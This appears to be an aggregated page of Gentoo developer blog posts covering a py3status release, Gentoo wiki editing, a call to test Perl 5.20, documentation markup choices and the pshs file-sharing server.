The logic behind this release is that py3status now wraps and extends your i3status.conf which allows all the following crazy features :

For all your i3bar modules i3status and py3status alike thanks to the new on_click parameter which you can use like any other i3status.conf parameter on all modules. It has never been so easy to handle click events !

This is a quick and small example of what it looks like :

# run thunar when I left click on the / disk info module
disk / {
    format = "/ %free"
    on_click 1 = "exec thunar /"
  • All py3status contributed modules are now shipped and usable directly without the need to copy them to your local folder. They also get to be configurable directly from your i3status config (see below)

No need to copy and edit the contributed py3status modules you like and wish to use, you can now load and configure them directly from your i3status.conf.

All py3status modules (contributed ones and user loaded ones) are now loaded and ordered using the usual syntax order += in your i3status.conf !

  • All modules have been improved, cleaned up and some of them got some love from contributors.
  • Every click event now triggers a refresh of the clicked module, even for i3status modules. This makes your i3bar more responsive than ever !


  • @AdamBSteele
  • @obb
  • @scotte
  • @tablet-mode

Thank you

  • Jakub Jedelsky : py3status is now packaged on Fedora Linux.
  • All of you users : py3status has broken the 100 stars on github, I’m still amazed by this. @Lujeni’s prophecy has come true :)
  • I still have some nice ideas in stock for even more functionalities, stay tuned !

January 03, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Gentoo Wiki is growing (January 03, 2015, 08:09 UTC)

Perhaps it is because of the winter holidays, but the last weeks I’ve noticed a lot of updates and edits on the Gentoo wiki.

The move to the Tyrian layout, whose purpose is to eventually become the unified layout for all Gentoo resources, happened first. Then, three common templates (Code, File and Kernel) where deprecated in favor of their “*Box” counterparts (CodeBox, FileBox and KernelBox). These provide better parameter support (which should make future updates on the templates easier to implement) as well as syntax highlighting.

But the wiki also saw a number of contributions being added. I added a short article on Efibootmgr as the Gentoo handbook now also uses it for its EFI related instructions, but other users added quite a few additional articles as well. As they come along, articles are being marked by editors for translation. For me, that’s a trigger.

Whenever a wiki article is marked for translations, it shows up on the PageTranslation list. When I have time, I pick one of these articles and try to update it to move to a common style (the Guidelines page is the “official” one, and I have a Styleguide in which I elaborate a bit more on the use). Having a common style gives a better look and feel to the articles (as they are then more alike), gives a common documentation development approach (so everyone can join in and update documentation in a similar layout/structure) and – most importantly – reduces the number of edits that do little more than switch from one formatting to another.

When an article has been edited, I mark it for translation, and then the real workhorse on the wiki starts. We have several active translators on the Gentoo wiki, who we cannot thank hard enough for their work (I used to start at Gentoo as a translator, I have some feeling about their work). They make the Gentoo documentation reachable for a broader audience. Thanks to the use of the translation extension (kindly offered by the Gentoo wiki admins, who have been working quite hard the last few weeks on improving the wiki infrastructure) translations are easier to handle and follow through.

The advantage of a translation-marked article is that any change on the article also shows up on the list again, allowing me to look at the change and perform edits when necessary. For the end user, this is behind the scenes – an update on an article shows up immediately, which is fine. But for me (and perhaps other editors as well) this gives a nice overview of changes to articles (watchlists can only go so far) and also shows the changes in a simple yet efficient manner. Thanks to this approach, we can more actively follow up on edits and improve where necessary.

Now, editing is not always just a few minutes of work. Consider the GRUB2 article on the wiki. It was marked for translation, but had some issues with its style. It was very verbose (which is not a bad thing, but suggests to split information towards multiple articles) and quite a few open discussions on its Discussions page. I started editing the article around 13.12h local time, and ended at 19.40h. Unlike with offline documentation, the entire process of the editing can be followed through the page’ history). And although I’m still not 100% satisfied with the result, it is imo easier to follow through and read.

However, don’t get me wrong – I do not feel that the article was wrong in any way. Although I would appreciate articles that immediately follow a style, I rather see more contributions (which we can then edit towards the new style) than that we would start penalizing contributors that don’t use the style. That would work contra-productive, because it is far easier to update the style of an article than to write articles. We should try and get more contributors to document aspects of their Gentoo journey.

So, please keep them coming. If you find a lack of (good) information for something, start jotting down what you know in an article. We’ll gladly help you out with editing and improving the article then, but the content is something you are probably best to write down.

January 02, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Most of us in the Gentoo Perl packaging team are already running ~arch Perl even on otherwise stable machines, and Perl 5.20 is looking very good so far. Our current plan is to wait for another month or similar and file the stabilization request for it in February. This would be a real achievement, since we'd at that time actually have the latest and greatest upstream stable Perl release also stable in Gentoo; this hasn't been the case for a very long time.
Of course, we need testers for that; the architecture teams cannot possibly try out all Perl programs in Gentoo with the new version. So, if you're feeling adventurous, and if you are running a fully updated stable system, please help us!
What do you need to do? First, upgrade perl-cleaner to ~arch by placing the following line in your package.keywords (or package.accept_keywords)
and updating perl-cleaner (to currently 2.19):
emerge -u1a perl-cleaner
Then, upgrade Perl (and only Perl) to ~arch by placing the following exact three lines in your package.keywords (or package.accept_keywords):
Then, upgrade your system with
emerge -uDNav world
perl-cleaner --all
This should now already be much easier than with previous Perl versions. In theory, all Perl packages should be rebuilt by emerge via the subslot rebuild mechanism, and perl-cleaner should not find anything to do anymore, but we cannot be 100% sure of that yet so far. (Looking forward to feedback.)
Well, and then use Perl and use your system, and if you encounter any problems, file bugs!!!

A final remark, once Perl 5.20 becomes stable you may want to remove above keywording lines from your portage configuration again.

Luca Barbato a.k.a. lu_zero (homepage, bugs)
Document your project! (January 02, 2015, 16:45 UTC)

After discussing how to track your bugs and your contributions, let see what we have about documentation

Pain and documentation

An healthy Open Source project needs mainly contributors, contributors are usually your users. You get users if the project is known and useful. (and you do not have parasitic entities syphoning your work abusing git-merge, best luck to io.js and markdown-it to not have this experience, switching name is enough of a pain without it).

In order to gain mindshare, the best thing is making what you do easier to use and that requires documenting what you did! The process is usually boring, time consuming and every time you change something you have to make sure the documentation still matches reality.

In the opensource community we have multiple options on the kind of documentation we produce and how to produce.


When you need to keep some structure, but you want to have an easy way to edit it wiki can be a good choice and it can lead to nice results. The information present is usually correct and if enough people keep editing it up to date.


  • The wiki is quick to edit and you can have people contribute by just using a browser.
  • The documentation is indexed by the search engines easily
  • It can be restricted to a number of trusted people

  • The information is detached from the actual code and it could desync easily
  • Even if kept up to date, what applies to the current release is not what your poor user might have
  • Usually keeping versioned content is not that simple


Even if usually they are noisy forums are a good source of information plenty of time.
Personally I try to move interesting bits to a wiki page when I found something that is not completely transient.


  • Usually everything require less developer interaction
  • User can share solutions to their problem effectively

  • The information can get stale even quicker that what you have in the wiki
  • Since it is mainly user-generate the solutions proposed might be suboptimal
  • Being highly interactive it requires more dedicated people to take care of unruly users


There are lots of good toolchain to write full manuals as we have in Gentoo.

The old style xml/docbook tend to have a really steep learning curve, not to mention the even more quirky and wonderful monster such as LaTeX (and the lesser texinfo). ReStructuredText, asciidoc and some flavour of markdown seem to be a better tool for the task if you need speed and get contributors up to speed.


  • A proper manual can be easily pinned to a specific release
  • It can be versioned using git
  • Some people still like something they can print and has a proper index

  • With the old tools it is a pain to start it
  • The learning curve can be still unbearable for most contributors
  • It requires some additional dedication to keep it up to date

What to use and why

Usually for small projects the manual is the README, once it grows usually a wiki is the best place to put notes from multiple people. If you are good at it a manual is a boon for all your users.

Tools to have documentation-in-code such as doxygen or docurium can help a lot if your project is having a single codebase.

If you need to unify a LOT of different information, like we have in Gentoo. The problems usually get much more annoying since you have contents written in multiple markups, living in multiple places and usually moving it from one place to another requires a serious editing effort (like moving from our guidexml to the current semantic wiki).

Markup suggestion


I do like a lot CommonMark and I even started to port and extend it to be used in docutils since I find ReStructuredText too confusing for the normal users. The best quality of it is the natural flow, it is most annoying defect is that there are too many parser discrepancies and sometimes implementations disagrees. Still is better to have many good implementation than one subpar in everything (hi texinfo, I hate your toolchain).


The markup is quite nice (up to a point) and the toolchain is sort of nice even if it feels like a Rube Goldberg machine. To my knowledge there is a single implementation of it and that makes me MUCH wary of using it in new projects.


The markup is not as intuitive as Asciidoc, thus quite far from Markdown immediate-use feeling, but it has great toolchain (if you like python) and it gets extended to produce lots of different well formatted documents.
It comes with loads markup features that Markdown core lacks: include directive, table of contents, pluggable generic block and span directives, 3 different flavours of tables.

Good if you can come to terms with its complexity all in all.

What’s next

Hopefully during this year among my many smaller and bigger projects, I’ll find time to put together something nice for documentation as well.

December 26, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
pshs — the awesome file sharing tool (December 26, 2014, 16:00 UTC)

For a long time I lacked a proper tool to quickly share a few files for a short time. The tools I was able to find either required some setup, installing client counterparts or sending my files to a third-party host. So I felt the need to write something new.

The HTTP protocol seemed an obvious choice. Relatively simple, efficient, with some client software installed almost everywhere. So I took HTTP::Server::Simple (I think) and wrote the first version of script. I added a few features to that script but it never felt good enough…

So back in 2011 I decided to reboot the project. This time I decided to use C and libevent, and that’s how pshs came into being. With some development occuring in the last three years, lately I started adding new features aiming to turn it into something really awesome.

So what pshs is? It’s a simple, zero-configuration command-line HTTP server to share files. You pass a list of files and it lets you share them.

Screenshot of pshs

But what really makes pshs special are the features:

  1. it shares only the files specified on the command-line — no need for extra configuration, moving files to separate directories etc. It simply returns 404 for any path not specified on the command-line, whether it exists or not.
  2. Full, working Range support. You can resume interrupted downloads and seek freely. Confirmed that playing a movie remotely works just fine.
  3. Unless told otherwise, it chooses a random port to use. You don’t have to decide on one, you have use pshs alongside regular HTTP servers and other services, and you can freely run multiple instances of pshs if you need to. TODO: perform port search until free port is found on the interface having external IP.
  4. Netlink and UPnP support provide the best means to obtain the external IP. If you have one on local interface, pshs will find and print it. If you don’t, it will try to enable port forwarding using UPnP and obtain the external IP from a UPnP-compliant router.
  5. QRCode printing (idea copied from systemd). Want to text a link to your files? Just scan the code!
  6. MIME-type guessing. Well, it’s not that special but makes sure your images show up as imagines in a web browser rather than opaque files that can only be saved.
  7. Zero-configuration SSL/TLS support — the keys and a self-signed certificate with correct public IP are generated at startup. While this is far from perfect (think of all the browsers complaining about self-signed certificates), it at least gives you the possibility of using encryption. It also prints the certificate fingerprint if you’d like to verify the authenticity.

I have also a few nice ideas in TODO, yet unsure which of them will be actually implemented:

  1. HTTP digest authentication support — in case you wanted some real security on the files you share.
  2. Download progress reporting — to let you know if and for how long do you need to keep the server up. Sadly, this does not look easy given the current libevent design.
  3. ncurses UI — to provide visual means for progress reporting :). Additional possibilities include keeping server URL on screen, a status line, and possibly scrolling logs.
  4. GTK+ UI with a tray icon and notification daemon support — to provide better desktop integration for sharing files from your favorite file manager.
  5. Recursive directory sharing — currently you have to list all files explicitly. This may include better directory indexes since currently pshs creates only one index of all files.

Which of those features would you find useful? What other features you’d like to see in pshs?